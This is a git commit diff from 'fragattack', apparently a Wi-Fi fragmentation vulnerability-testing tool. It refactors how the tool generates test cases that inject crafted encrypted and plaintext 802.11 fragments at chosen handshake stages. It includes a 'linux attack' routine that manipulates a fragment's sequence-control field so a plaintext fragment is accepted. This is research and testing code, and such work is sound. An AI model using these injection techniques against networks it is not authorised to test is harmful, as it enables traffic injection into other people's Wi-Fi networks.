fragattack: improved test case generation

This commit is contained in:
Mathy 2020-03-28 13:33:34 -04:00
parent 624325b73e
commit 9f35e823f1

View File

@ -58,7 +58,7 @@ class TestOptions():
self.routerip = None self.routerip = None
class MetaFrag(): class Frag():
# StartingAuth, AfterAuthRace # StartingAuth, AfterAuthRace
# StartAuth: when starting the handshake # StartAuth: when starting the handshake
# BeforeAuth: right before last message of the handshake # BeforeAuth: right before last message of the handshake
@ -66,18 +66,24 @@ class MetaFrag():
# Connected: 1 second after handshake completed (allows peer to install keys) # Connected: 1 second after handshake completed (allows peer to install keys)
StartAuth, BeforeAuth, AfterAuth, Connected = range(4) StartAuth, BeforeAuth, AfterAuth, Connected = range(4)
def __init__(self, frag, trigger, encrypted, wait_rekey=False, inc_pn=1): def __init__(self, trigger, encrypted, frame=None, wait_rekey=False, inc_pn=1):
self.frag = frag
self.encrypted = encrypted
self.inc_pn = inc_pn
self.trigger = trigger self.trigger = trigger
self.encrypted = encrypted
self.wait_rekey = wait_rekey self.wait_rekey = wait_rekey
class TestCase(): self.inc_pn = inc_pn
def __init__(self): self.frame = frame
self.fragments = []
self.verify = None class Test():
# Type of request packet to use in general tests.
# XXX --- We should always first see how the DUT reactions to a normal packet.
# For example, Aruba only responded to DHCP after reconnecting, and
# ignored ICMP and ARP packets.
ARP, ICMP, DHCP = range(3)
def __init__(self, fragments=None):
self.fragments = fragments if fragments != None else []
self.check = None
def next_trigger_is(self, trigger): def next_trigger_is(self, trigger):
if len(self.fragments) == 0: if len(self.fragments) == 0:
@ -85,9 +91,6 @@ class TestCase():
return not self.fragments[0].wait_rekey and \ return not self.fragments[0].wait_rekey and \
self.fragments[0].trigger == trigger self.fragments[0].trigger == trigger
def success_on(self, payload):
self.verify = payload
def next(self): def next(self):
frag = self.fragments[0] frag = self.fragments[0]
del self.fragments[0] del self.fragments[0]
@ -150,9 +153,10 @@ class Station():
repr(repr(p)) repr(repr(p))
if self.test.verify and self.test.verify in raw(p): if self.test != None and self.test.check != None and self.test.check(p):
log(STATUS, "SUCCESSFULL INJECTION", color="green") log(STATUS, "SUCCESSFULL INJECTION", color="green")
print(repr(p)) print(repr(p))
self.test = Test()
def send_mon(self, data, prior=1): def send_mon(self, data, prior=1):
""" """
@ -233,68 +237,65 @@ class Station():
return fragments return fragments
def encrypt(self, frame, inc_pn=1): def encrypt(self, frame, inc_pn=1):
self.pn += inc_pn
key, keyid = (self.tk, 0) if int(frame.addr1[1], 16) & 1 == 0 else (self.gtk, self.gtk_idx) key, keyid = (self.tk, 0) if int(frame.addr1[1], 16) & 1 == 0 else (self.gtk, self.gtk_idx)
encrypted = encrypt_ccmp(frame, key, self.pn, keyid) encrypted = encrypt_ccmp(frame, key, self.pn, keyid)
self.pn += inc_pn
return encrypted return encrypted
def generate_test_arpping(self, trigger, num_frags=2): def generate_request(self, ptype):
header = self.get_header() header = self.get_header()
request = LLC()/SNAP()/ARP(op=1, hwsrc=self.mac, psrc=self.ip, hwdst=self.peermac, pdst=self.peerip) if ptype == Test.ARP:
frags = self.create_fragments(header, request, num_frags) # XXX --- Add extra checks on the ARP packet
check = lambda p: ARP in p and p.hwsrc == self.peermac and p.psrc == self.peerip
request = LLC()/SNAP()/ARP(op=1, hwsrc=self.mac, psrc=self.ip, hwdst=self.peermac, pdst=self.peerip)
test = TestCase() elif ptype == Test.ICMP:
for frag in frags: label = b"test_ping_icmp"
test.fragments.append(MetaFrag(frag, trigger, False)) check = lambda p: ICMP in p and label in raw(p)
request = LLC()/SNAP()/IP(src=self.ip, dst=self.peerip)/ICMP()/Raw(label)
elif ptype == Test.DHCP:
xid = random.randint(0, 2**31)
check = lambda p: BOOTP in p and p[BOOTP].xid == xid
rawmac = bytes.fromhex(self.mac.replace(':', ''))
request = LLC()/SNAP()/IP(src="0.0.0.0", dst="255.255.255.255")
request = request/UDP(sport=68, dport=67)/BOOTP(op=1, chaddr=rawmac, xid=xid)
request = request/DHCP(options=[("message-type", "discover"), "end"])
# We assume DHCP discover is sent towards the AP.
# XXX Is there an equivalent for against the client? Response to DHCP Discover/Request?
header.addr3 = "ff:ff:ff:ff:ff:ff"
return header, request, check
def generate_test_ping(self, ptype, frags):
test = Test(frags)
header, request, test.check = self.generate_request(ptype)
frames = self.create_fragments(header, request, len(frags))
for frag, frame in zip(frags, frames):
frag.frame = frame
return test return test
def generate_test_ping(self, trigger, num_frags=2, encrypted=True): def generate_linux_attack_ping(self, ptype):
magic = b"generate_test_ping" test = Test()
header, request, test.check = self.generate_request(ptype)
header = self.get_header() header = self.get_header()
request = LLC()/SNAP()/IP(src=self.ip, dst=self.peerip)/ICMP()/Raw(magic)
frags = self.create_fragments(header, request, num_frags)
test = TestCase()
for frag in frags:
test.fragments.append(MetaFrag(frag, trigger, encrypted))
test.success_on(magic)
return test
def generate_test_ping_mixed(self):
magic = b"generate_test_ping"
header = self.get_header()
request = LLC()/SNAP()/IP(src=self.ip, dst=self.peerip)/ICMP()/Raw(magic)
frag1, frag2 = self.create_fragments(header, request, 2) frag1, frag2 = self.create_fragments(header, request, 2)
#frag1.addr1 = "ff:ff:ff:ff:ff:ff" # Fragment 1: normal
#frag2.addr1 = "ff:ff:ff:ff:ff:ff" test.fragments.append(Frag(frag1, Frag.Connected, True))
test = TestCase()
test.fragments.append(MetaFrag(frag1, MetaFrag.AfterAuth, False))
test.fragments.append(MetaFrag(frag2, MetaFrag.AfterAuth, True))
test.success_on(magic)
return test
def generate_linux_attack_ping(self):
magic = b"generate_test_ping"
header = self.get_header()
request = LLC()/SNAP()/IP(src=self.ip, dst=self.peerip)/ICMP()/Raw(magic)
frag1, frag2 = self.create_fragments(header, request, 2)
test = TestCase()
test.fragments.append(MetaFrag(frag1, MetaFrag.AfterAuth, True))
# Fragment 2: make Linux update latest used crypto Packet Number
frag2enc = frag2.copy() frag2enc = frag2.copy()
frag2enc.SC ^= (1 << 4) | 1 frag2enc.SC ^= (1 << 4) | 1
test.fragments.append(MetaFrag(frag2enc, MetaFrag.AfterAuth, True)) test.fragments.append(Frag(frag2enc, Frag.Connected, True))
test.fragments.append(MetaFrag(frag2, MetaFrag.AfterAuth, False)) # Fragment 3: can now inject last fragment as plaintext
test.fragments.append(Frag(frag2, Frag.Connected, False))
test.success_on(magic)
return test return test
def generate_test_eapol(self, num_bytes=16, num_frags=1): def generate_test_eapol(self, num_bytes=16, num_frags=1):
@ -302,9 +303,9 @@ class Station():
request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32) request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32)
frags = self.create_fragments(header, request, num_frags) frags = self.create_fragments(header, request, num_frags)
test = TestCase() test = Test()
for frag in frags: for frag in frags:
test.fragments.append(MetaFrag(frag), MetaFrag.StartAuth, False) test.fragments.append(Frag(frag), Frag.StartAuth, False)
return test return test
@ -321,37 +322,29 @@ class Station():
# To generate the tests we need to know the MAC and IP addresses # To generate the tests we need to know the MAC and IP addresses
test = TestCase() test = Test()
#test.fragments.append(MetaFrag(frag1, MetaFrag.BeforeAuth, False)) #test.fragments.append(Frag(frag1, Frag.BeforeAuth, False))
#test.fragments.append(MetaFrag(frag2copy, MetaFrag.BeforeAuth, False)) #test.fragments.append(Frag(frag2copy, Frag.BeforeAuth, False))
#test.fragments.append(MetaFrag(frag2copy, MetaFrag.AfterAuth, False)) #test.fragments.append(Frag(frag2copy, Frag.AfterAuth, False))
test.fragments.append(MetaFrag(header/LLC()/SNAP()/IP()/ICMP(), MetaFrag.AfterAuth, False)) test.fragments.append(Frag(header/LLC()/SNAP()/IP()/ICMP(), Frag.AfterAuth, False))
#test.fragments.append(MetaFrag(frag2, MetaFrag.AfterAuth, True)) #test.fragments.append(Frag(frag2, Frag.AfterAuth, True))
return test
def generate_test_rekey(self):
magic = b"rekey_attack"
header = self.get_header()
request = LLC()/SNAP()/IP(src=self.ip, dst=self.peerip)/ICMP()/Raw(magic)
frag1, frag2 = self.create_fragments(header, request, 2)
test = TestCase()
test.fragments.append(MetaFrag(frag1, MetaFrag.BeforeAuth, True, wait_rekey=True))
test.fragments.append(MetaFrag(frag2, MetaFrag.AfterAuth, True))
test.success_on(magic)
return test return test
def generate_tests(self): def generate_tests(self):
#self.test = self.generate_test_arpping(MetaFrag.AfterAuth) self.test = self.generate_test_ping(Test.DHCP,
#self.test = self.generate_test_ping(MetaFrag.AfterAuth, num_frags=1, encrypted=True) [Frag(Frag.Connected, True)])
#Frag(Frag.Connected, True)])
#self.test = self.generate_test_ping(Test.DHCP,
# [Frag(Frag.BeforeAuth, True, wait_rekey=True),
# Frag(Frag.AfterAuth, True)])
#self.text = self.generate_test_eapol() #self.text = self.generate_test_eapol()
#self.test = self.generate_test_eapol_debug() #self.test = self.generate_test_eapol_debug()
#self.test = TestCase() #self.test = Test()
#self.test = self.generate_test_ping_mixed()
#self.test = self.generate_linux_attack_ping() #self.test = self.generate_linux_attack_ping()
self.test = self.generate_test_rekey() #self.test = self.generate_test_rekey()
# - Test case to check if the receiver supports interleaved priority # - Test case to check if the receiver supports interleaved priority
# reception. It seems Windows 10 / Intel might not support this. # reception. It seems Windows 10 / Intel might not support this.
@ -382,18 +375,18 @@ class Station():
self.reset_keys() self.reset_keys()
def inject_next_frags(self, trigger): def inject_next_frags(self, trigger):
frag = None frame = None
while self.test.next_trigger_is(trigger): while self.test.next_trigger_is(trigger):
metafrag = self.test.next() Frag = self.test.next()
if metafrag.encrypted: if Frag.encrypted:
assert self.tk != None and self.gtk != None assert self.tk != None and self.gtk != None
frag = self.encrypt(metafrag.frag, inc_pn=metafrag.inc_pn) frame = self.encrypt(Frag.frame, inc_pn=Frag.inc_pn)
log(STATUS, "Encrypted fragment with key " + self.tk.hex()) log(STATUS, "Encrypted fragment with key " + self.tk.hex())
else: else:
frag = metafrag.frag frame = Frag.frame
self.daemon.inject_mon(frag) self.daemon.inject_mon(frame)
print("[Injected fragment]", repr(frag)) print("[Injected fragment]", repr(frame))
# With ath9k_htc devices, there's a bug when injecting a frame with the # With ath9k_htc devices, there's a bug when injecting a frame with the
# More Fragments (MF) field *and* operating the interface in AP mode # More Fragments (MF) field *and* operating the interface in AP mode
@ -406,7 +399,7 @@ class Station():
# Note: when the device is only operating in monitor mode, this does # Note: when the device is only operating in monitor mode, this does
# not seem to be a problem. # not seem to be a problem.
# #
if self.options.inject_workaround and frag != None and frag.FCfield & 0x4 != 0: if self.options.inject_workaround and frame != None and frame.FCfield & 0x4 != 0:
self.daemon.inject_mon(Dot11(addr1="ff:ff:ff:ff:ff:ff")) self.daemon.inject_mon(Dot11(addr1="ff:ff:ff:ff:ff:ff"))
print("[Injected packet] Prevent ath9k_htc bug after fragment injection") print("[Injected packet] Prevent ath9k_htc bug after fragment injection")
@ -420,15 +413,15 @@ class Station():
# Inject any fragments before authenticating # Inject any fragments before authenticating
if not self.txed_before_auth: if not self.txed_before_auth:
log(STATUS, "MetaFrag.StartAuth", color="green") log(STATUS, "Frag.StartAuth", color="green")
self.inject_next_frags(MetaFrag.StartAuth) self.inject_next_frags(Frag.StartAuth)
self.txed_before_auth = True self.txed_before_auth = True
self.txed_before_auth_done = False self.txed_before_auth_done = False
# Inject any fragments when almost done authenticating # Inject any fragments when almost done authenticating
elif is_msg3_or_4 and not self.txed_before_auth_done: elif is_msg3_or_4 and not self.txed_before_auth_done:
log(STATUS, "MetaFrag.BeforeAuth", color="green") log(STATUS, "Frag.BeforeAuth", color="green")
self.inject_next_frags(MetaFrag.BeforeAuth) self.inject_next_frags(Frag.BeforeAuth)
self.txed_before_auth_done = True self.txed_before_auth_done = True
self.txed_before_auth = False self.txed_before_auth = False
@ -441,7 +434,7 @@ class Station():
# - This is also important because the station might have already installed the # - This is also important because the station might have already installed the
# key before this script can send the EAPOL frame over Ethernet (but we didn't # key before this script can send the EAPOL frame over Ethernet (but we didn't
# yet request the key from this script). # yet request the key from this script).
# - Send with high priority, otherwise MetaFrag.AfterAuth might be send before # - Send with high priority, otherwise Frag.AfterAuth might be send before
# the EAPOL frame by the Wi-Fi chip. # the EAPOL frame by the Wi-Fi chip.
self.send_mon(eapol) self.send_mon(eapol)
@ -452,8 +445,8 @@ class Station():
if not self.obtained_ip: return if not self.obtained_ip: return
log(STATUS, "MetaFrag.AfterAuth", color="green") log(STATUS, "Frag.AfterAuth", color="green")
self.inject_next_frags(MetaFrag.AfterAuth) self.inject_next_frags(Frag.AfterAuth)
self.time_connected = time.time() + 1 self.time_connected = time.time() + 1
@ -465,8 +458,8 @@ class Station():
def handle_connected(self): def handle_connected(self):
"""This is called ~1 second after completing the handshake""" """This is called ~1 second after completing the handshake"""
log(STATUS, "MetaFrag.Connected", color="green") log(STATUS, "Frag.Connected", color="green")
self.inject_next_frags(MetaFrag.Connected) self.inject_next_frags(Frag.Connected)
#self.daemon.rekey(self) #self.daemon.rekey(self)
self.check_rekey() self.check_rekey()
@ -710,7 +703,7 @@ class Authenticator(Daemon):
self.apmac = scapy.arch.get_if_hwaddr(self.nic_iface) self.apmac = scapy.arch.get_if_hwaddr(self.nic_iface)
def configure_daemon(self): def configure_daemon(self):
# Intercept EAPOL packets that the client wants to send # Intercept EAPOL packets that the AP wants to send
wpaspy_command(self.wpaspy_ctrl, "SET ext_eapol_frame_io 1") wpaspy_command(self.wpaspy_ctrl, "SET ext_eapol_frame_io 1")
# Let scapy handle DHCP requests # Let scapy handle DHCP requests